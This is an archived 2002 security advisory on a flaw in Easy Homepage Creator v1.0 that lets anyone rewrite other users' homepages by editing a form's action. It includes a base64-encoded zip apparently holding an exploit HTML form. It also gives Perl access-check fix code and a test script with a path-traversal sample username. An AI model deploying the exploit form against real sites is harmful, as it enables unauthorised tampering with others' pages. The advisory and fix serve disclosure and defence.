
Easy Homepage Creator privilege escalation



29th Jul 2002 [SBWID-5567]
COMMAND

	Easy Homepage Creator privilege escalation

SYSTEMS AFFECTED

	 Advanced Easy Homepage Creator v1.0 

	 Easy Homepage Creator v1.0 

	

PROBLEM

	From the AresU advisory [http://bosen.net/advisories/aresu-adv.001.txt]:

	Anyone can easily change another user's homepage without access validation.
	

	Exploit:
	=======

	Change the action in the HTML form.
	

	

	Content-Transfer-Encoding: base64
	Content-Description: easyhomepage.zip
	Content-Disposition: attachment; filename="easyhomepage.zip"

	UEsDBBQAAAAIAIMS/CwdaBQXdwIAAEQEAAARAAAAZWFzeWhvbWVwYWdlLmh0
	bWyNU1Fr20AMfjfsP2iGwQaOnXQPzYIdyLZmXWnX0KaFPpXznRoftX3mTpc0
	+/XTOfEKY4z5yZI/Sd/3Sc7fjkYQnQm3h3PTYCc2CF8sCjIW7n3dohWlrjXt
	IYq+CkLonxlc+HoPk2kCJ+PxCUS3uEUbUPzpXG8qeL8yzumyRiADqDRBg02J
	FqrjlA9ctHeEjYPF0xNKQjWDCI7PQm1FK1HB35ltJ+n4FfwvTHSPreLo7uZy
	BhVRN8uy3W6XItc4aXVHLpUm9c8QBbmw3nfIGr4TKIMOWkPgHcJCSnQO7kWt
	lSBt2t+yBj0QLTxVPKm3Z2HR3UH0zSLSz4CdwWfjsE1grQ36fQK4PP2YwK14
	1nShdyKBVjdqkcCSK6ulto4SWNQbw65WTQJXNl0JJdpNxNakrKYfcxRUhtZp
	i5QJtdWOa9Blghv5ESfS8XiS0gu9idaVduCMtxJBGoXA4RNTRuVlr0rU0Hnb
	cTu4/nH5EI1Gc7Ywr6ip57nEltByIq8m8/+4mDxjHKNJhDMojVVoizFIrOtO
	KKXbTXHSR64TMkQT2GlFVRF/Gr+LQ+Xy+uaK74ZtVUW8ur5dx9CKBoveeCED
	4yI+erDVHDfZsI4sYFK50aHRnUMbCmeQ67bzdOgS+2M6nudl0PVgPEjRHvZq
	qOJrDZDXFZdYmx3bzprwhdhgAdbsXBFPTmPQzHFAPoYWR7J/JqWpuWI6DcRW
	Nd8h/yLh6Pa8FxbrHEMd6BZ4PqY8KxuG9WYGouHGclIga+FcQaYbcgd1h3Tp
	icKdcu8idr5swvCtqD2HZ0HhsL2BZ6D3OJBlTzJS8358v/MsLOMQh332b/1d
	QPQLUEsBAhQAFAAAAAgAgxL8LB1oFBd3AgAARAQAABEAAAAAAAAAAQAgALaB
	AAAAAGVhc3lob21lcGFnZS5odG1sUEsFBgAAAAABAAEAPwAAAKYCAAAAAA==

	

SOLUTION

	Add access validation to the "print_html_to_file" function. Add the
	following code to edit.cgi:
	

# Relies on the script's existing globals: %FORM (the parsed form fields),
# $rootdir (the data directory) and the colour/logo variables used by dienice.
# Profile files ($rootdir/profiles/<username>.pro) hold the username on
# their second line and the password on their third.
sub login_check
{
    if ($FORM{'username'} eq "" or $FORM{'password'} eq "")
    {
        dienice("Sorry, but you haven't entered a Username or Password.  Please press the 'back' button on your browser to return to the login screen.");
    }
    $FORM{'username'} =~ tr/A-Z/a-z/;
    $FORM{'password'} =~ tr/A-Z/a-z/;

    # Only accept a plain account name before it is used to build a file
    # path, so the field cannot name a file outside $rootdir/profiles
    # (added check; the permitted character set is an assumption).
    if ($FORM{'username'} !~ /^[a-z0-9_]+$/)
    {
        dienice("Sorry, but you have entered an invalid username or password.  Please press the 'back' button on your browser to return to the login form.");
    }

    open(PROFILE, "<$rootdir/profiles/$FORM{'username'}.pro")
        || dienice("Sorry, but you have entered an invalid username or password.  Please press the 'back' button on your browser to return to the login form.");
    @DATA = <PROFILE>;
    chomp(@DATA);
    if (!($FORM{'username'} eq $DATA[1] && $FORM{'password'} eq $DATA[2]))
    {
        dienice("Sorry, but you have entered an invalid username or password.  Please press the 'back' button on your browser to return to the Login Form and try logging-in again.");
    }
    close(PROFILE);

    open(CHECK_USERNAME, "<$rootdir/profiles/ban_users.dat")
        || dienice("Configuration Error!  Unable to open ban_users.dat file for reading.  Please contact the webmaster of this web site.  The following error occurred : $!");
    @check = <CHECK_USERNAME>;
    chomp(@check);
    close(CHECK_USERNAME);

    foreach $line (@check)
    {
        # \Q...\E makes the username match literally rather than as a
        # regular expression.
        if ($line =~ /\Q$FORM{'username'}\E/i)
        {
            dienice("Sorry, but you have been banned from using the Homepage Creator.  You should have been sent an email explaining why you have been banned from using the Homepage Creator.  For more details contact the webmaster of this web site.");
        }
    }
}

# Prints an error page and stops the script.  The here-document
# terminator must start in column one.
sub dienice
{
    my($msg) = @_;
    print <<EndHTML;
<html>
<head>
<title>Homepage Login Error</title>
</head>
<body bgcolor="$bg_colour" link="$hyperlinks_colour" vlink="$hyperlinks_colour" alink="$hyperlinks_colour">
<p align="center">$logo_url $banner_url</p>
<hr color="$linebreakcolour">
<p align="left"><b> Homepage Login Error</b></p>
<p align="left"><b>$msg</b></p>
<hr color="$linebreakcolour">
<p align="center"><b>&copy; Copyright <a href="http://www.easyscripts.co.uk">Easy Scripts Archive</a> 2001.  All Rights Reserved.</b></p>
</body>
</html>
EndHTML
    exit;
}

	

	And add this as the first line of the "print_html_to_file" function:

	&login_check;
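	The following script is an added example, not code from the AresU advisory or from the Easy Scripts product. It restates the login_check logic as a function that returns a result instead of printing and exiting, so it can be run offline against constructed in-memory stand-ins for the profile files and ban_users.dat, and it shows why the save step must perform this check itself: a form whose hidden fields name a victim account is rejected unless it also carries that account's password. The function name authorize_save, the data names and the sample accounts are assumptions.

```perl
#!/usr/bin/perl
# Added example: the save handler re-validates credentials instead of
# trusting whatever username the submitted form carries.
use strict;
use warnings;

# Constructed stand-ins for $rootdir/profiles/<user>.pro (line 2 holds the
# username, line 3 the password) and for ban_users.dat.
my %profile_files = (
    alice   => [ "Alice's page",   "alice",   "s3cret"  ],
    bob     => [ "Bob's page",     "bob",     "hunter2" ],
    mallory => [ "Mallory's page", "mallory", "evil"    ],
);
my @ban_users = ("mallory");

# Same rules as the advisory's login_check, returned as a string.
# The page that gets written must then be derived from the verified
# $user, never from a separate form field.
sub authorize_save {
    my ($form, $profiles, $banned) = @_;
    my $user = lc($form->{username} // '');
    my $pass = lc($form->{password} // '');

    return 'denied: missing username or password' if $user eq '' || $pass eq '';
    # Restrict the account name before it is used to build a file path.
    return 'denied: malformed username' if $user !~ /^[a-z0-9_]+$/;

    my $data = $profiles->{$user}
        or return 'denied: invalid username or password';
    return 'denied: invalid username or password'
        unless $user eq $data->[1] && $pass eq $data->[2];

    # Case-insensitive match against the ban list.
    return 'denied: banned' if grep { lc($_) eq $user } @$banned;

    return 'ok';
}

# Constructed requests: the first two model a form edited to name another
# account; only the last one carries the owner's own credentials.
my @requests = (
    { label => 'forged form, no password',     form => { username => 'alice' } },
    { label => 'forged form, wrong password',  form => { username => 'alice', password => 'guess' } },
    { label => 'path characters in username',  form => { username => '../other', password => 'x' } },
    { label => 'banned account',               form => { username => 'mallory', password => 'evil' } },
    { label => 'owner with correct password',  form => { username => 'Alice', password => 'S3CRET' } },
);

for my $r (@requests) {
    my $result = authorize_save($r->{form}, \%profile_files, \@ban_users);
    printf "%-32s -> %s\n", $r->{label}, $result;
}
```

	Run it with perl; every request except the last prints a "denied" line. The lowercasing of both fields mirrors the advisory's tr/A-Z/a-z/ calls, which is why "Alice" with "S3CRET" still matches the stored "alice"/"s3cret" pair.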

	

	

